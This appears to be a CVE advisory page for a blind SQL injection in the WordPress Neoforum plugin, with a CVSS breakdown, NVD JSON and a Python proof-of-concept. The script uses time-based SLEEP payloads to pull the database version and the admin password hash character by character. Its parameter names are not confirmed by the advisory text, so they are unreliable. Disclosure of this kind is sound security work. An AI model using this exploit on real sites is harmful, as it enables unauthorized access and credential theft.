Security Vulnerability Report
中文
CVE-2026-24624 CVSS 7.6 HIGH

CVE-2026-24624

Published: 2026-01-23 15:16:22
Last Modified: 2026-04-28 15:16:21

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in saeros1984 Neoforum neoforum allows Blind SQL Injection.This issue affects Neoforum: from n/a through <= 1.0.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Neoforum <= 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24624 PoC - WordPress Neoforum Blind SQL Injection # Requires high privilege authentication import requests import time target_url = "http://target-site.com/wp-admin/admin.php" # The vulnerable parameter in Neoforum plugin vulnerable_param = "forum_id" def blind_sql_inject(payload): """Execute blind SQL injection test""" cookies = { "wordpress_sec_": "admin_session_cookie" } data = { vulnerable_param: payload, "action": "neoforum_get_posts" } start_time = time.time() response = requests.post(target_url, data=data, cookies=cookies) elapsed = time.time() - start_time return elapsed > 5 # Time-based blind injection # Example: Extract database version using time-based blind injection def extract_db_version(): payload = "1' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)-- -" if blind_sql_inject(payload): return "MySQL 5.x" return "Unknown" # Example: Extract admin password hash def extract_admin_hash(): charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" result = "" for i in range(1, 33): for char in charset: payload = f"1' AND IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),{i},1)='{char}',SLEEP(5),0)-- -" if blind_sql_inject(payload): result += char break return result print("Testing CVE-2026-24624 PoC") print(f"Database version: {extract_db_version()}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24624", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:21.613", "lastModified": "2026-04-28T15:16:20.703", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in saeros1984 Neoforum neoforum allows Blind SQL Injection.This issue affects Neoforum: from n/a through <= 1.0."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en saeros1984 Neoforum neoforum permite Inyección SQL Ciega. Este problema afecta a Neoforum: desde n/d hasta &lt;= 1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/neoforum/vulnerability/wordpress-neoforum-plugin-1-0-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}